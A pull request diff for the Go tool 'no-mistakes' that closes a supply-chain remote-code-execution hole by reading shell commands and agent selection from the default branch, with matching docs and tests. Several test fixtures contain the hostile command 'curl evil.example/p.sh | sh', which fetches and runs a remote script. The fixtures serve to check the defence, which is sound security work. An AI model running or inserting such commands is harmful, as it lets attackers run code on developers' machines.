### PR TITLE
fix(security): load repo config from default branch, not pushed SHA (supply-chain RCE)

### DIFF
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -95,6 +95,13 @@ Safest local verification sequence after non-trivial changes:
 - Prefer targeted package tests while iterating, then finish with `go test -race ./...` and `make e2e` when your change affects those process or I/O boundaries.
 - The e2e suite lives behind the `e2e` build tag, so it is excluded from `go test ./...` and runs separately in CI via `make e2e`.
 
+**Repo Config Trust Boundary (security)**
+
+- The daemon runs `commands.*` from `.no-mistakes.yaml` verbatim via `sh -c`. To prevent supply-chain RCE, the code-executing fields (`commands.{test,lint,format}`) are loaded from `origin/<defaultBranch>` (the trusted default branch), never from the pushed SHA. See `internal/daemon/manager.go` `startRun` + `loadTrustedRepoConfig`, and `config.EffectiveRepoConfig`.
+- Non-executing fields (`agent`, `ignore_patterns`, `auto_fix`, `intent`, `test`) are still read from the pushed branch.
+- A maintainer opts in to pushed-branch commands with `allow_repo_commands: true` in global config (default `false`). When changing this logic, keep `commands.*` locked to the default branch and update the e2e test `TestRepoConfigCommandsFromDefaultBranch`.
+- The e2e harness models a trusted single-developer environment, so it defaults `allow_repo_commands` to `true` via `SetupOpts.AllowRepoCommands`; security tests pass `false` to exercise the secure default.
+
 **When Making Changes**
 
 - Whenever you must bring in new dependencies, check latest documentation for knowledge, and discuss with the user.

--- a/AGENTS.md
+++ b/AGENTS.md
@@ -97,10 +97,11 @@ Safest local verification sequence after non-trivial changes:
 
 **Repo Config Trust Boundary (security)**
 
-- The daemon runs `commands.*` from `.no-mistakes.yaml` verbatim via `sh -c`. To prevent supply-chain RCE, the code-executing fields (`commands.{test,lint,format}`) are loaded from `origin/<defaultBranch>` (the trusted default branch), never from the pushed SHA. See `internal/daemon/manager.go` `startRun` + `loadTrustedRepoConfig`, and `config.EffectiveRepoConfig`.
-- Non-executing fields (`agent`, `ignore_patterns`, `auto_fix`, `intent`, `test`) are still read from the pushed branch.
-- A maintainer opts in to pushed-branch commands with `allow_repo_commands: true` in global config (default `false`). When changing this logic, keep `commands.*` locked to the default branch and update the e2e test `TestRepoConfigCommandsFromDefaultBranch`.
-- The e2e harness models a trusted single-developer environment, so it defaults `allow_repo_commands` to `true` via `SetupOpts.AllowRepoCommands`; security tests pass `false` to exercise the secure default.
+- The daemon runs `commands.*` from `.no-mistakes.yaml` verbatim via `sh -c`, and `agent` selects which process launches (incl. `acp:` targets) with the maintainer's credentials. To prevent supply-chain RCE, the **code-executing selection fields (`commands.{test,lint,format}` and `agent`)** are loaded from the trusted default branch, never from the pushed SHA. See `internal/daemon/manager.go` `startRun` + `loadTrustedRepoConfig`, and `config.EffectiveRepoConfig`.
+- `startRun` fetches the default branch, resolves it to an exact commit SHA (`git.ResolveRef`), and `loadTrustedRepoConfig` reads `.no-mistakes.yaml` at that **pinned SHA** (not the `origin/<defaultBranch>` ref name). On fetch failure (or if the ref does not resolve) the trusted SHA is empty → `loadTrustedRepoConfig` returns nil → `EffectiveRepoConfig` forces empty `commands`/`agent`. This fails closed: a stale `origin/<default>` ref left in the shared bare repo by a previous run cannot serve a value the live default branch removed. Regression tests: `TestLoadTrustedRepoConfig_FailClosedOnFetchFailure`, `TestLoadTrustedRepoConfig_PinnedSHAReadsFreshDefaultBranch`.
+- Non-executing fields (`ignore_patterns`, `auto_fix`, `intent`, `test`) are still read from the pushed branch.
+- `allow_repo_commands` is **per-repo, read from the trusted default-branch copy of `.no-mistakes.yaml`** (declared on `RepoConfig`), never the global config and never the pushed SHA. It defaults `false`; when `true` the maintainer has opted in to honoring the pushed branch's `commands` and `agent` wholesale. A contributor cannot self-enable it from a pushed branch. When changing this logic, keep `commands`/`agent` locked to the default branch and update the e2e test `TestRepoConfigCommandsFromDefaultBranch` (incl. the `pushed_branch_cannot_self_enable` subtest).
+- The e2e harness models a trusted single-developer environment, so it commits `allow_repo_commands: true` to the default-branch `.no-mistakes.yaml` via `SetupOpts.AllowRepoCommands`; security tests pass `false` to exercise the secure default.
 
 **When Making Changes**
 

--- a/docs/src/content/docs/reference/global-config.md
+++ b/docs/src/content/docs/reference/global-config.md
@@ -32,6 +32,10 @@ ci_timeout: "4h"
 
 log_level: info
 
+# Opt in to honoring commands.* from pushed branches. Default false: repo
+# commands are only ever loaded from the default branch.
+# allow_repo_commands: false
+
 auto_fix:
   rebase: 3
   review: 0
@@ -193,6 +197,17 @@ Daemon log verbosity.
 | Type | `string` |
 | Values | `debug`, `info`, `warn`, `error` |
 | Default | `info` |
+
+### allow_repo_commands
+
+Opt in to honoring the code-executing fields `commands.{test,lint,format}` from a contributor's pushed branch instead of the trusted default-branch copy.
+
+| | |
+|---|---|
+| Type | `bool` |
+| Default | `false` |
+
+By default the daemon reads `commands.*` from your default branch (e.g. `origin/main`) so a pushed SHA cannot inject shell on the daemon host. Leave this `false` for any repo that accepts contributions. Set it to `true` only for a single-developer environment where you trust every branch you push (for example, a personal repo gated by your own daemon). See [Repo Config Reference](./repo-config.md) for the trust-boundary details.
 
 ### auto_fix
 

--- a/docs/src/content/docs/reference/global-config.md
+++ b/docs/src/content/docs/reference/global-config.md
@@ -32,10 +32,6 @@ ci_timeout: "4h"
 
 log_level: info
 
-# Opt in to honoring commands.* from pushed branches. Default false: repo
-# commands are only ever loaded from the default branch.
-# allow_repo_commands: false
-
 auto_fix:
   rebase: 3
   review: 0
@@ -197,17 +193,6 @@ Daemon log verbosity.
 | Type | `string` |
 | Values | `debug`, `info`, `warn`, `error` |
 | Default | `info` |
-
-### allow_repo_commands
-
-Opt in to honoring the code-executing fields `commands.{test,lint,format}` from a contributor's pushed branch instead of the trusted default-branch copy.
-
-| | |
-|---|---|
-| Type | `bool` |
-| Default | `false` |
-
-By default the daemon reads `commands.*` from your default branch (e.g. `origin/main`) so a pushed SHA cannot inject shell on the daemon host. Leave this `false` for any repo that accepts contributions. Set it to `true` only for a single-developer environment where you trust every branch you push (for example, a personal repo gated by your own daemon). See [Repo Config Reference](./repo-config.md) for the trust-boundary details.
 
 ### auto_fix
 

--- a/docs/src/content/docs/reference/repo-config.md
+++ b/docs/src/content/docs/reference/repo-config.md
@@ -5,6 +5,12 @@ description: All fields for .no-mistakes.yaml.
 
 Per-repo configuration lives in `.no-mistakes.yaml` at the root of your repository.
 
+:::caution[Security: commands are read from the default branch]
+`commands.*` (and only those fields) execute arbitrary shell on the daemon host via `sh -c` / `cmd.exe /c`. To prevent a supply-chain attack where a contributor lands a hostile `commands.*` on a gated branch, the daemon always reads the **code-executing fields from your default branch** (e.g. `origin/main`), never from the pushed SHA. Commit the `commands` you want the gate to run to your default branch. Non-executing fields (`agent`, `ignore_patterns`, `auto_fix`, `intent`, `test`) are still read from the pushed branch.
+
+If you genuinely want per-branch `commands` (for example, a single-developer repo where you trust your own feature branches), opt in with [`allow_repo_commands: true`](./global-config.md#allow_repo_commands) in global config. This re-enables the previous behavior with eyes open.
+:::
+
 ```yaml
 # .no-mistakes.yaml
 

--- a/docs/src/content/docs/reference/repo-config.md
+++ b/docs/src/content/docs/reference/repo-config.md
@@ -5,10 +5,10 @@ description: All fields for .no-mistakes.yaml.
 
 Per-repo configuration lives in `.no-mistakes.yaml` at the root of your repository.
 
-:::caution[Security: commands are read from the default branch]
-`commands.*` (and only those fields) execute arbitrary shell on the daemon host via `sh -c` / `cmd.exe /c`. To prevent a supply-chain attack where a contributor lands a hostile `commands.*` on a gated branch, the daemon always reads the **code-executing fields from your default branch** (e.g. `origin/main`), never from the pushed SHA. Commit the `commands` you want the gate to run to your default branch. Non-executing fields (`agent`, `ignore_patterns`, `auto_fix`, `intent`, `test`) are still read from the pushed branch.
+:::caution[Security: code-executing fields are read from the default branch]
+`commands.*` execute arbitrary shell on the daemon host via `sh -c` / `cmd.exe /c`, and `agent` selects which process launches there (including `acp:` targets) with the maintainer's credentials. To prevent a supply-chain attack where a contributor lands a hostile value on a gated branch, the daemon always reads **`commands` and `agent` from your default branch** (e.g. `origin/main`), never from the pushed SHA, and reads them at the exact commit a fresh fetch resolved (so a stale `origin/<default>` ref cannot serve a value the live default branch removed). If the fetch fails, both fields are forced empty — the run proceeds on built-in defaults rather than falling back to a potentially stale or hostile copy. Commit the `commands` and `agent` you want the gate to run to your default branch. Non-executing fields (`ignore_patterns`, `auto_fix`, `intent`, `test`) are still read from the pushed branch.
 
-If you genuinely want per-branch `commands` (for example, a single-developer repo where you trust your own feature branches), opt in with [`allow_repo_commands: true`](./global-config.md#allow_repo_commands) in global config. This re-enables the previous behavior with eyes open.
+If you genuinely want per-branch `commands` and `agent` (for example, a single-developer repo where you trust your own feature branches), opt in with [`allow_repo_commands: true`](#allow_repo_commands) in this same file on your default branch. This re-enables the previous behavior with eyes open. The switch is read only from the trusted default-branch copy, so a contributor cannot self-enable it from a pushed branch.
 :::
 
 ```yaml
@@ -60,6 +60,17 @@ Override the default agent for this repo and its setup-wizard suggestions.
 `auto` resolves to the first supported native agent found on `PATH` in this order: `claude`, `codex`, `opencode`, `acli` with `rovodev` support, then `pi`.
 `acp:<target>` uses the user-installed `acpx` binary configured in global config.
 ACP agents are opt-in and are not considered by `agent: auto`.
+
+### allow_repo_commands
+
+Opt in to honoring the code-executing selection fields (`commands.{test,lint,format}` and `agent`) from a contributor's pushed branch instead of the trusted default-branch copy.
+
+| | |
+|---|---|
+| Type | `bool` |
+| Default | `false` |
+
+This field is itself read **only from the trusted default-branch copy** of `.no-mistakes.yaml`, never from the pushed SHA, so a contributor cannot self-enable it by setting it on a feature branch. By default the daemon reads `commands` and `agent` from your default branch (e.g. `origin/main`) so a pushed SHA cannot inject shell or pick the launched agent on the daemon host. Leave this `false` for any repo that accepts contributions. Set it to `true` only for a single-developer environment where you trust every branch you push (for example, a personal repo gated by your own daemon).
 
 ### commands.test
 

--- a/internal/config/config.go
+++ b/internal/config/config.go
@@ -1,6 +1,7 @@
 package config
 
 import (
+	"bytes"
 	"context"
 	"errors"
 	"fmt"
@@ -445,7 +446,9 @@ func LoadGlobal(path string) (*GlobalConfig, error) {
 	}
 
 	var raw globalConfigRaw
-	if err := yaml.Unmarshal(data, &raw); err != nil {
+	dec := yaml.NewDecoder(bytes.NewReader(data))
+	dec.KnownFields(true)
+	if err := dec.Decode(&raw); err != nil {
 		return nil, fmt.Errorf("parse global config: %w", err)
 	}
 

--- a/internal/config/config.go
+++ b/internal/config/config.go
@@ -25,15 +25,9 @@ type GlobalConfig struct {
 	AgentArgsOverride    map[string][]string `yaml:"agent_args_override"`
 	CITimeout            time.Duration       `yaml:"-"`
 	LogLevel             string              `yaml:"log_level"`
-	// AllowRepoCommands opts in to honoring code-executing fields
-	// (commands.{test,lint,format}) from a contributor's pushed branch
-	// instead of the trusted default-branch copy. Default false: repo
-	// commands are only ever loaded from the default branch so a pushed
-	// SHA cannot inject shell on the maintainer's daemon host.
-	AllowRepoCommands bool `yaml:"allow_repo_commands"`
-	AutoFix           AutoFixRaw
-	Intent            IntentRaw
-	Test              TestRaw
+	AutoFix              AutoFixRaw
+	Intent               IntentRaw
+	Test                 TestRaw
 }
 
 // globalConfigRaw is the on-disk YAML representation with duration as string.
@@ -46,7 +40,6 @@ type globalConfigRaw struct {
 	CITimeout            string              `yaml:"ci_timeout"`
 	BabysitTimeout       string              `yaml:"babysit_timeout"`
 	LogLevel             string              `yaml:"log_level"`
-	AllowRepoCommands    bool                `yaml:"allow_repo_commands"`
 	AutoFix              AutoFixRaw          `yaml:"auto_fix"`
 	Intent               IntentRaw           `yaml:"intent"`
 	Test                 TestRaw             `yaml:"test"`
@@ -57,9 +50,16 @@ type RepoConfig struct {
 	Agent          types.AgentName `yaml:"agent"`
 	Commands       Commands        `yaml:"commands"`
 	IgnorePatterns []string        `yaml:"ignore_patterns"`
-	AutoFix        AutoFixRaw      `yaml:"auto_fix"`
-	Intent         IntentRaw       `yaml:"intent"`
-	Test           TestRaw         `yaml:"test"`
+	// AllowRepoCommands opts in to honoring the code-executing selection
+	// fields (commands.{test,lint,format} and agent) from a contributor's
+	// pushed branch instead of the trusted default-branch copy. It is read
+	// ONLY from the trusted default-branch copy of .no-mistakes.yaml (never
+	// the pushed SHA), so a contributor cannot self-enable. Default false:
+	// the pushed branch controls nothing that executes.
+	AllowRepoCommands bool       `yaml:"allow_repo_commands"`
+	AutoFix           AutoFixRaw `yaml:"auto_fix"`
+	Intent            IntentRaw  `yaml:"intent"`
+	Test              TestRaw    `yaml:"test"`
 }
 
 // Commands holds optional per-repo command overrides.
@@ -481,7 +481,6 @@ func LoadGlobal(path string) (*GlobalConfig, error) {
 	if raw.LogLevel != "" {
 		cfg.LogLevel = raw.LogLevel
 	}
-	cfg.AllowRepoCommands = raw.AllowRepoCommands
 	if raw.AutoFix.CI == nil {
 		raw.AutoFix.CI = raw.AutoFix.Babysit
 	}
@@ -532,18 +531,22 @@ func parseRepoConfig(data []byte) (*RepoConfig, error) {
 // EffectiveRepoConfig returns the repo config that should drive the pipeline
 // given a pushed-branch copy and the trusted default-branch copy.
 //
-// Code-executing fields (Commands) are taken only from the trusted copy when
-// it is present, so a contributor's pushed branch cannot inject shell
-// commands that run on the maintainer's daemon host. When allowRepoCommands
-// is true the maintainer has explicitly opted in to honoring the
-// pushed-branch commands. When there is no trusted copy and the maintainer
-// has not opted in, Commands is forced empty rather than falling back to the
-// pushed branch — this blocks the supply-chain vector for repos that ship
-// .no-mistakes.yaml only on feature branches.
+// The code-executing selection fields — Commands (run verbatim via sh -c on
+// the daemon host) and Agent (selects which process launches with the
+// maintainer's credentials, including acp: targets) — are taken only from
+// the trusted copy when it is present, so a contributor's pushed branch
+// cannot inject shell or pick an agent. When allowRepoCommands is true the
+// maintainer has explicitly opted in (via allow_repo_commands on the
+// TRUSTED default-branch copy) to honoring the pushed-branch copy wholesale.
+// When there is no trusted copy and the maintainer has not opted in, both
+// fields are forced empty (Agent "" inherits the global agent; Commands{}
+// yields built-in defaults) rather than falling back to the pushed branch —
+// this blocks the supply-chain vector for repos that ship .no-mistakes.yaml
+// only on feature branches.
 //
-// Non-executing fields (agent override, ignore patterns, auto-fix, intent,
-// test) are always taken from the pushed copy, matching prior behavior, since
-// they cannot run arbitrary shell.
+// Non-executing fields (ignore patterns, auto-fix, intent, test) are always
+// taken from the pushed copy, matching prior behavior, since they cannot
+// run arbitrary shell or select a process.
 func EffectiveRepoConfig(pushed, trusted *RepoConfig, allowRepoCommands bool) *RepoConfig {
 	if pushed == nil {
 		pushed = &RepoConfig{}
@@ -554,8 +557,10 @@ func EffectiveRepoConfig(pushed, trusted *RepoConfig, allowRepoCommands bool) *R
 	}
 	if trusted != nil {
 		effective.Commands = trusted.Commands
+		effective.Agent = trusted.Agent
 	} else {
 		effective.Commands = Commands{}
+		effective.Agent = ""
 	}
 	return &effective
 }

--- a/internal/config/config.go
+++ b/internal/config/config.go
@@ -25,9 +25,15 @@ type GlobalConfig struct {
 	AgentArgsOverride    map[string][]string `yaml:"agent_args_override"`
 	CITimeout            time.Duration       `yaml:"-"`
 	LogLevel             string              `yaml:"log_level"`
-	AutoFix              AutoFixRaw
-	Intent               IntentRaw
-	Test                 TestRaw
+	// AllowRepoCommands opts in to honoring code-executing fields
+	// (commands.{test,lint,format}) from a contributor's pushed branch
+	// instead of the trusted default-branch copy. Default false: repo
+	// commands are only ever loaded from the default branch so a pushed
+	// SHA cannot inject shell on the maintainer's daemon host.
+	AllowRepoCommands bool `yaml:"allow_repo_commands"`
+	AutoFix           AutoFixRaw
+	Intent            IntentRaw
+	Test              TestRaw
 }
 
 // globalConfigRaw is the on-disk YAML representation with duration as string.
@@ -40,6 +46,7 @@ type globalConfigRaw struct {
 	CITimeout            string              `yaml:"ci_timeout"`
 	BabysitTimeout       string              `yaml:"babysit_timeout"`
 	LogLevel             string              `yaml:"log_level"`
+	AllowRepoCommands    bool                `yaml:"allow_repo_commands"`
 	AutoFix              AutoFixRaw          `yaml:"auto_fix"`
 	Intent               IntentRaw           `yaml:"intent"`
 	Test                 TestRaw             `yaml:"test"`
@@ -474,6 +481,7 @@ func LoadGlobal(path string) (*GlobalConfig, error) {
 	if raw.LogLevel != "" {
 		cfg.LogLevel = raw.LogLevel
 	}
+	cfg.AllowRepoCommands = raw.AllowRepoCommands
 	if raw.AutoFix.CI == nil {
 		raw.AutoFix.CI = raw.AutoFix.Babysit
 	}
@@ -498,6 +506,19 @@ func LoadRepo(dir string) (*RepoConfig, error) {
 		return nil, fmt.Errorf("read repo config: %w", err)
 	}
 
+	return parseRepoConfig(data)
+}
+
+// LoadRepoFromBytes parses per-repo config from raw YAML bytes. It is the
+// trusted-config entry point: callers that read .no-mistakes.yaml from a
+// specific git ref (e.g. the default branch) use this to avoid honoring a
+// contributor's checked-out copy.
+func LoadRepoFromBytes(data []byte) (*RepoConfig, error) {
+	return parseRepoConfig(data)
+}
+
+func parseRepoConfig(data []byte) (*RepoConfig, error) {
+	cfg := &RepoConfig{}
 	if err := yaml.Unmarshal(data, cfg); err != nil {
 		return nil, fmt.Errorf("parse repo config: %w", err)
 	}
@@ -506,6 +527,37 @@ func LoadRepo(dir string) (*RepoConfig, error) {
 	}
 
 	return cfg, nil
+}
+
+// EffectiveRepoConfig returns the repo config that should drive the pipeline
+// given a pushed-branch copy and the trusted default-branch copy.
+//
+// Code-executing fields (Commands) are taken only from the trusted copy when
+// it is present, so a contributor's pushed branch cannot inject shell
+// commands that run on the maintainer's daemon host. When allowRepoCommands
+// is true the maintainer has explicitly opted in to honoring the
+// pushed-branch commands. When there is no trusted copy and the maintainer
+// has not opted in, Commands is forced empty rather than falling back to the
+// pushed branch — this blocks the supply-chain vector for repos that ship
+// .no-mistakes.yaml only on feature branches.
+//
+// Non-executing fields (agent override, ignore patterns, auto-fix, intent,
+// test) are always taken from the pushed copy, matching prior behavior, since
+// they cannot run arbitrary shell.
+func EffectiveRepoConfig(pushed, trusted *RepoConfig, allowRepoCommands bool) *RepoConfig {
+	if pushed == nil {
+		pushed = &RepoConfig{}
+	}
+	effective := *pushed
+	if allowRepoCommands {
+		return &effective
+	}
+	if trusted != nil {
+		effective.Commands = trusted.Commands
+	} else {
+		effective.Commands = Commands{}
+	}
+	return &effective
 }
 
 // ParseLogLevel converts a log level string to slog.Level.

--- a/internal/config/config_repo_trust_test.go
+++ b/internal/config/config_repo_trust_test.go
@@ -1,0 +1,151 @@
+package config
+
+import (
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/kunchenguid/no-mistakes/internal/types"
+)
+
+func TestLoadRepoFromBytes(t *testing.T) {
+	data := []byte("commands:\n  lint: \"golangci-lint run\"\nagent: codex\n")
+	cfg, err := LoadRepoFromBytes(data)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if cfg.Commands.Lint != "golangci-lint run" {
+		t.Errorf("lint = %q", cfg.Commands.Lint)
+	}
+	if cfg.Agent != types.AgentCodex {
+		t.Errorf("agent = %q", cfg.Agent)
+	}
+}
+
+func TestLoadRepoFromBytes_InvalidYAML(t *testing.T) {
+	if _, err := LoadRepoFromBytes([]byte("{{invalid")); err == nil {
+		t.Fatal("expected error for invalid YAML")
+	}
+}
+
+func TestEffectiveRepoConfig_TrustedOverridesPushedCommands(t *testing.T) {
+	pushed := &RepoConfig{
+		Agent: types.AgentCodex,
+		Commands: Commands{
+			Lint:   "curl evil.example/p.sh | sh",
+			Test:   "curl evil.example/t.sh | sh",
+			Format: "curl evil.example/f.sh | sh",
+		},
+		IgnorePatterns: []string{"vendor/**"},
+	}
+	trusted := &RepoConfig{
+		Commands: Commands{
+			Lint:   "golangci-lint run",
+			Test:   "go test ./...",
+			Format: "gofmt -w .",
+		},
+	}
+
+	got := EffectiveRepoConfig(pushed, trusted, false)
+
+	if got.Commands.Lint != "golangci-lint run" {
+		t.Errorf("lint = %q, want trusted value", got.Commands.Lint)
+	}
+	if got.Commands.Test != "go test ./..." {
+		t.Errorf("test = %q, want trusted value", got.Commands.Test)
+	}
+	if got.Commands.Format != "gofmt -w ." {
+		t.Errorf("format = %q, want trusted value", got.Commands.Format)
+	}
+	// Non-executing fields still come from the pushed copy.
+	if got.Agent != types.AgentCodex {
+		t.Errorf("agent = %q, want pushed value", got.Agent)
+	}
+	if len(got.IgnorePatterns) != 1 || got.IgnorePatterns[0] != "vendor/**" {
+		t.Errorf("ignore_patterns = %v, want pushed value", got.IgnorePatterns)
+	}
+	// The pushed config must not be mutated.
+	if pushed.Commands.Lint != "curl evil.example/p.sh | sh" {
+		t.Errorf("pushed config was mutated: lint = %q", pushed.Commands.Lint)
+	}
+}
+
+func TestEffectiveRepoConfig_OptInHonorsPushedCommands(t *testing.T) {
+	pushed := &RepoConfig{Commands: Commands{Lint: "curl evil.example/p.sh | sh"}}
+	trusted := &RepoConfig{Commands: Commands{Lint: "golangci-lint run"}}
+
+	got := EffectiveRepoConfig(pushed, trusted, true)
+
+	if got.Commands.Lint != "curl evil.example/p.sh | sh" {
+		t.Errorf("lint = %q, want pushed value under opt-in", got.Commands.Lint)
+	}
+}
+
+func TestEffectiveRepoConfig_NoTrustedDisablesCommands(t *testing.T) {
+	pushed := &RepoConfig{Commands: Commands{
+		Lint: "curl evil.example/p.sh | sh",
+		Test: "curl evil.example/t.sh | sh",
+	}}
+
+	got := EffectiveRepoConfig(pushed, nil, false)
+
+	if got.Commands.Lint != "" {
+		t.Errorf("lint = %q, want empty (no trusted config)", got.Commands.Lint)
+	}
+	if got.Commands.Test != "" {
+		t.Errorf("test = %q, want empty (no trusted config)", got.Commands.Test)
+	}
+}
+
+func TestEffectiveRepoConfig_NoTrustedOptInStillHonorsPushed(t *testing.T) {
+	pushed := &RepoConfig{Commands: Commands{Lint: "make lint"}}
+
+	got := EffectiveRepoConfig(pushed, nil, true)
+
+	if got.Commands.Lint != "make lint" {
+		t.Errorf("lint = %q, want pushed value under opt-in", got.Commands.Lint)
+	}
+}
+
+func TestEffectiveRepoConfig_NilPushedSafeDefaults(t *testing.T) {
+	trusted := &RepoConfig{Commands: Commands{Lint: "golangci-lint run"}}
+
+	got := EffectiveRepoConfig(nil, trusted, false)
+
+	if got.Commands.Lint != "golangci-lint run" {
+		t.Errorf("lint = %q, want trusted value", got.Commands.Lint)
+	}
+}
+
+func TestLoadGlobal_AllowRepoCommands(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "config.yaml")
+	data := `agent: claude
+allow_repo_commands: true
+`
+	if err := os.WriteFile(path, []byte(data), 0o644); err != nil {
+		t.Fatal(err)
+	}
+	cfg, err := LoadGlobal(path)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if !cfg.AllowRepoCommands {
+		t.Errorf("AllowRepoCommands = false, want true")
+	}
+}
+
+func TestLoadGlobal_AllowRepoCommandsDefaultsFalse(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "config.yaml")
+	if err := os.WriteFile(path, []byte("agent: claude\n"), 0o644); err != nil {
+		t.Fatal(err)
+	}
+	cfg, err := LoadGlobal(path)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if cfg.AllowRepoCommands {
+		t.Errorf("AllowRepoCommands = true, want false by default")
+	}
+}

--- a/internal/config/config_repo_trust_test.go
+++ b/internal/config/config_repo_trust_test.go
@@ -39,6 +39,7 @@ func TestEffectiveRepoConfig_TrustedOverridesPushedCommands(t *testing.T) {
 		IgnorePatterns: []string{"vendor/**"},
 	}
 	trusted := &RepoConfig{
+		Agent: types.AgentClaude,
 		Commands: Commands{
 			Lint:   "golangci-lint run",
 			Test:   "go test ./...",
@@ -57,10 +58,13 @@ func TestEffectiveRepoConfig_TrustedOverridesPushedCommands(t *testing.T) {
 	if got.Commands.Format != "gofmt -w ." {
 		t.Errorf("format = %q, want trusted value", got.Commands.Format)
 	}
-	// Non-executing fields still come from the pushed copy.
-	if got.Agent != types.AgentCodex {
-		t.Errorf("agent = %q, want pushed value", got.Agent)
+	// Agent is code-executing selection: it comes from the trusted copy, not
+	// the pushed branch, so a contributor cannot redirect which process
+	// launches with the maintainer's credentials.
+	if got.Agent != types.AgentClaude {
+		t.Errorf("agent = %q, want trusted value", got.Agent)
 	}
+	// Non-executing fields still come from the pushed copy.
 	if len(got.IgnorePatterns) != 1 || got.IgnorePatterns[0] != "vendor/**" {
 		t.Errorf("ignore_patterns = %v, want pushed value", got.IgnorePatterns)
 	}
@@ -68,24 +72,55 @@ func TestEffectiveRepoConfig_TrustedOverridesPushedCommands(t *testing.T) {
 	if pushed.Commands.Lint != "curl evil.example/p.sh | sh" {
 		t.Errorf("pushed config was mutated: lint = %q", pushed.Commands.Lint)
 	}
+	if pushed.Agent != types.AgentCodex {
+		t.Errorf("pushed config was mutated: agent = %q", pushed.Agent)
+	}
+}
+
+// TestEffectiveRepoConfig_TrustedEmptyAgentInheritsGlobal proves that when the
+// trusted copy does not pin an agent, the effective agent is empty so Merge
+// falls back to the global agent — the pushed-branch agent never wins.
+func TestEffectiveRepoConfig_TrustedEmptyAgentInheritsGlobal(t *testing.T) {
+	pushed := &RepoConfig{Agent: types.AgentCodex}
+	trusted := &RepoConfig{Commands: Commands{Lint: "golangci-lint run"}}
+
+	got := EffectiveRepoConfig(pushed, trusted, false)
+
+	if got.Agent != "" {
+		t.Errorf("agent = %q, want empty so Merge inherits global", got.Agent)
+	}
 }
 
 func TestEffectiveRepoConfig_OptInHonorsPushedCommands(t *testing.T) {
-	pushed := &RepoConfig{Commands: Commands{Lint: "curl evil.example/p.sh | sh"}}
-	trusted := &RepoConfig{Commands: Commands{Lint: "golangci-lint run"}}
+	pushed := &RepoConfig{
+		Agent:    types.AgentCodex,
+		Commands: Commands{Lint: "curl evil.example/p.sh | sh"},
+	}
+	trusted := &RepoConfig{
+		Agent:    types.AgentClaude,
+		Commands: Commands{Lint: "golangci-lint run"},
+	}
 
 	got := EffectiveRepoConfig(pushed, trusted, true)
 
 	if got.Commands.Lint != "curl evil.example/p.sh | sh" {
 		t.Errorf("lint = %q, want pushed value under opt-in", got.Commands.Lint)
 	}
+	// Under opt-in the maintainer trusts the pushed branch wholesale, so the
+	// pushed agent is honored too.
+	if got.Agent != types.AgentCodex {
+		t.Errorf("agent = %q, want pushed value under opt-in", got.Agent)
+	}
 }
 
 func TestEffectiveRepoConfig_NoTrustedDisablesCommands(t *testing.T) {
-	pushed := &RepoConfig{Commands: Commands{
-		Lint: "curl evil.example/p.sh | sh",
-		Test: "curl evil.example/t.sh | sh",
-	}}
+	pushed := &RepoConfig{
+		Agent: types.AgentCodex,
+		Commands: Commands{
+			Lint: "curl evil.example/p.sh | sh",
+			Test: "curl evil.example/t.sh | sh",
+		},
+	}
 
 	got := EffectiveRepoConfig(pushed, nil, false)
 
@@ -95,38 +130,56 @@ func TestEffectiveRepoConfig_NoTrustedDisablesCommands(t *testing.T) {
 	if got.Commands.Test != "" {
 		t.Errorf("test = %q, want empty (no trusted config)", got.Commands.Test)
 	}
+	// No trusted copy → agent forced empty (inherits global) so a contributor
+	// who ships .no-mistakes.yaml only on a feature branch cannot pick the
+	// agent that launches with the maintainer's credentials.
+	if got.Agent != "" {
+		t.Errorf("agent = %q, want empty (no trusted config)", got.Agent)
+	}
 }
 
 func TestEffectiveRepoConfig_NoTrustedOptInStillHonorsPushed(t *testing.T) {
-	pushed := &RepoConfig{Commands: Commands{Lint: "make lint"}}
+	pushed := &RepoConfig{Agent: types.AgentCodex, Commands: Commands{Lint: "make lint"}}
 
 	got := EffectiveRepoConfig(pushed, nil, true)
 
 	if got.Commands.Lint != "make lint" {
 		t.Errorf("lint = %q, want pushed value under opt-in", got.Commands.Lint)
 	}
+	if got.Agent != types.AgentCodex {
+		t.Errorf("agent = %q, want pushed value under opt-in", got.Agent)
+	}
 }
 
 func TestEffectiveRepoConfig_NilPushedSafeDefaults(t *testing.T) {
-	trusted := &RepoConfig{Commands: Commands{Lint: "golangci-lint run"}}
+	trusted := &RepoConfig{
+		Agent:    types.AgentClaude,
+		Commands: Commands{Lint: "golangci-lint run"},
+	}
 
 	got := EffectiveRepoConfig(nil, trusted, false)
 
 	if got.Commands.Lint != "golangci-lint run" {
 		t.Errorf("lint = %q, want trusted value", got.Commands.Lint)
 	}
+	if got.Agent != types.AgentClaude {
+		t.Errorf("agent = %q, want trusted value", got.Agent)
+	}
 }
 
-func TestLoadGlobal_AllowRepoCommands(t *testing.T) {
+// TestLoadRepo_AllowRepoCommands proves the per-repo opt-in is read from the
+// repo config (the trusted default-branch copy), replacing the former coarse
+// global flag. It defaults false.
+func TestLoadRepo_AllowRepoCommands(t *testing.T) {
 	dir := t.TempDir()
-	path := filepath.Join(dir, "config.yaml")
+	path := filepath.Join(dir, ".no-mistakes.yaml")
 	data := `agent: claude
 allow_repo_commands: true
 `
 	if err := os.WriteFile(path, []byte(data), 0o644); err != nil {
 		t.Fatal(err)
 	}
-	cfg, err := LoadGlobal(path)
+	cfg, err := LoadRepo(dir)
 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
 	}
@@ -135,17 +188,43 @@ allow_repo_commands: true
 	}
 }
 
-func TestLoadGlobal_AllowRepoCommandsDefaultsFalse(t *testing.T) {
+func TestLoadRepo_AllowRepoCommandsDefaultsFalse(t *testing.T) {
 	dir := t.TempDir()
-	path := filepath.Join(dir, "config.yaml")
+	path := filepath.Join(dir, ".no-mistakes.yaml")
 	if err := os.WriteFile(path, []byte("agent: claude\n"), 0o644); err != nil {
 		t.Fatal(err)
 	}
-	cfg, err := LoadGlobal(path)
+	cfg, err := LoadRepo(dir)
 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
 	}
 	if cfg.AllowRepoCommands {
 		t.Errorf("AllowRepoCommands = true, want false by default")
+	}
+}
+
